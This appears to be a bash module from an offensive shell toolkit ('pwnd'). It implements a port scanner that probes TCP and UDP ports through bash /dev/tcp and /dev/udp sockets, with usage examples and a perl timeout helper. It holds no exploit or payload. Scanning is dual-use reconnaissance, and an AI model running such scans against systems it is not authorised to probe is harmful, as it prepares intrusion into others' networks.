CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # portscanner, A simple yet "cross platform" implementation of TCP and UDP port scanner using bash sockets __portscanner_usage() { cat << "EOF" usage: portscanner host [port/proto ...], [port-range/proto ...]> A simple yet "cross platform" implementation of portscanner using bash sockets. HOST can be IPv4 address or hostname. PORT can be any port number. PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is any range between 1 to 65535 following `/tcp' or `/udp' postfix. Examples: $ portscanner localhost 80/tcp This will check if TCP port 80 is open on localhost. $ portscanner localhost 53/tcp,53/udp This will check if TCP port 53 and UDP port 53 are opened on localhost. $ portscanner localhost 1-1024/tcp,69/udp This will check if TCP ports 1 to 1024 are opened and if UDP port 69 is opened on localhost. EOF return 0 } # TODO: Add alternative implementations for `timeout'-like functionality __portscanner_timeout() { # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time `perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"` # `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process } # Based on http://www.catonmat.net/blog/tcp-port-scanner-in-bash/ portscanner() { if [ -z "${2-}" ]; then __portscanner_usage return fi local host="$1" local ports=() local csv_args=() IFS=',' read -ra csv_args <<< "${@:2}" for arg in "${csv_args[@]}"; do case "$arg" in *-*) # i.e. 1-1024/tc local range_ports=() IFS='/' read -ra range_ports <<< "$arg" IFS='-' read start end <<< "${range_ports[0]}" for ((port=start; port <= end; port++)); do ports+=("$port/${range_ports[1]}") done ;; *,*) # i.e. '53/tcp, 53/udp' IFS=',' read -ra ports <<< "$arg" ;; *) # i.e. '80/tcp' ports+=("$arg") ;; esac done for port in "${ports[@]}"; do local conn_parameter=() IFS='/' read -ra conn_parameter <<< "$port" __portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" && echo "port $port is open" || echo "port $port is closed" done } pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"